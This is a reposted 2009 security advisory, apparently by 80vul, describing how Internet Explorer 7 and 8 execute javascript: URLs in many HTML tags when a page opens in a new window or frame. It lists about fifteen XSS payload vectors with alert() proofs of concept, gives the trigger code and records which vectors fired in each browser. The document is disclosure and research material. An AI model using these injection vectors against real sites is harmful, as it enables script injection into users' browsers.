Multiple Exploiting IE8/IE7 XSS Vulnerability 's

admin
admin
admin
140792
文章
117
评论
2017年5月3日02:32:03评论315 views字数 2224阅读7分24秒阅读模式
摘要

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt

Overview:

Tags[not include <IFRAME>] in ie7/8 are don’t allowe to run “javascript:[jscodz]”,but
we found them allowed ro run where open it in new target.

like this url:

http://www.80vul.com/test/ie8-1.htm

ie8-1.htm’s codz :

<STYLE>@import 'javascript:alert("xss1")';</STYLE> <IMG SRC=javascript:alert('XSS2')> <BODY BACKGROUND="javascript:alert('XSS3')"> <LINK REL="stylesheet" HREF="javascript:alert('XSS4');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');"> <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> <DIV STYLE="background-image: url(javascript:alert('XSS7'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <script SRC="javascript:alert('xss11');"></script> <video SRC="javascript:alert('xss12');"</video> <LAYER SRC="javascript:alert('xss13')"></LAYER> <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> <applet src="javascript:alert('xss15')" type=text/html>

when visite this url by ie7/8, <IFRAME SRC=”javascript:alert(‘XSS6’);”></IFRAME> this is runing, but other aren’t to run.
but, where open ie8-1.htm in new target[like this :<a href= target=”_blank”> and <iframe> and window.open in <sript> … etc.] ,so test this codz in my localhost:

<a href="http://www.80vul.com/test/ie8-1.htm" target="_blank">go</a>

[PS: <a href=”http://www.80vul.com/test/ie8-1.htm”>go</a> don’t work]

of couse this codz:

<iframe src="http://www.80vul.com/test/ie8s.htm"></iframe>

and this codz:

<script>window.open("http://www.80vul.com/test/ie8-1.htm");</script>

……..[testing]…….

So the results is :
———————————————————
IE | alert
———————————————————
ie7: xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9
——————————————————
ie8: xss4/xss1/xss11/xss6
———————————————————

Disclosure Timeline:

2009/05/01 – Found this Vulnerability
2009/06/22 – Public Disclosure

Greeting:

ycosxhack[http://hi.baidu.com/ycosxhack],Not his test,not this Vulnerability.

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月3日02:32:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Multiple Exploiting IE8/IE7 XSS Vulnerability 'shttps://cn-sec.com/archives/44791.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息